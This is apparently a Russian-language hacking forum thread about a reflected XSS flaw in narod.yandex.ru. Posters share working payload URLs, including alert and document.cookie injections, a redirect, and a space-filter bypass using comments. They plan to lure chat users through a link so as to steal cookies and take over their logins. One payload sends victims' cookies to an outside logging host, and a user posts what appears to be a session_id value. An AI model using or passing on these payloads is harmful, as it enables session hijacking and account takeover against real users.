xss на народ.ру
 

хз чё это такое, смотрите сами

http://narod.yandex.ru/100.xhtml?</font><script>alert('XSS by VectorG')</script><font>

гы
 

А зачем Font ? там и так всё круто...

http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>

respekt , карочи...
это круто, ща кавонть оприходуем ))

Странно у меня даже не что и не вылезло.

font чтоб красивее было... ))))
просто "Вы скачиваете файл с сайта alert(document.cookie)<>http://>http://" както каряво

неужели до меня это никто не публиковал??? я чёто погоречился тему создавать, просто потом подумал xss простейшая наверняка уже ктото нашёл...

странно..... у двоих работает.....

Что могу сказать у кого опера у того она не вылезет. У кого эксплолер тогда вылезает респект тебе =)).

Эту багу наверное пол инета до тебя нашло! ;)

да я и не спорю... просто некоторые не знали... для них и выложил... ;)

просто не публиковали

ды
 

Подобных шалостей везде хватает, но на народе ))))
я даже и не думал, что всё так банально...


Как говорится темнее всего у фонаря...

да я и сам сначала сомневался, просто нада было прогу скачать с народовсково сайта, в адресе была очень интересная строчка, я сразу подумал что на таком то сайте фень не пройдёт, но мои ожидания не оправдались... )))))))))

Скажите как её можно использовать ?

Ага, а то у меня просто вылезло яндексуид и ещё что-то...Зачем это нужно?

попробуй через осла посмотреть ;)

по ходу дела смысла от неё никакого... хотя если кто чё найдёт суйте сюда

Обработчик обрезает до первого слэша, поэтому от закрывающей "</script>" остается лишь "<".

Ну так чего, я и не думал, что на Народе будут показываться Яндексовские куки! Это ведь огромный простор для снифферства и т.п.!

насчёт слэша тоже не так всё просто, например такая бадья проходит:

http://narod.yandex.ru/100.xhtml?</font><script>location.replace('http://narod.ru')</script><font>

единственное пробелы не обрабатываются:
та же самая вставка картинки <img src=""> не проходит изза пробела, он в конечном случае идёт как %20 и весь код изпахабивается

пробел можешь комментом попробовать заменить: <img/**/src="">

СПАСИБА!!!!! ВСЁ РАБОТАЕТ!!!!

у меня мысль такая, сидеть в чате на народе, дать челу ссылку на свой "супер мега сайт", когда он заходит на него, через location.replace делается перевод на страницу с xss со снифером, я беру куки, заменяю их, и сижу под его логином... по моему это слишком наивно ...)))) единственное с той страницы берётся всё кроме session_id, как её вытащить?

Кстати, кто-нибудь может внятно ответить, почему IE 6 при вызове document.cookie выдает не все куки для данного домена? Чаще всего отсутствует тот, что содержит информацию о сессии.

Вот вам пример запроса:
http://narod.yandex.ru/100.xhtml?</font><script>img=new/**/Image;img.src="http://antichat.net/s/s.gif?"+document.cookie;</script><font>

Результат - http://antichat.net/s/log.php

а никто не в курсе на народе пассы хешируются вообще? если да то чем? А то никогда там акка не имел.

в куках в session_id в конце есть что похожее на md5:
01a5bd828b9c64b11e668234ce8601a9

но это не пароль, а чтото другое...

а это весь session_id:

1127555519.14140.0.4857540.2:29634083:3.16707.8923 1.01a5bd828b9c64b11e668234ce8601a9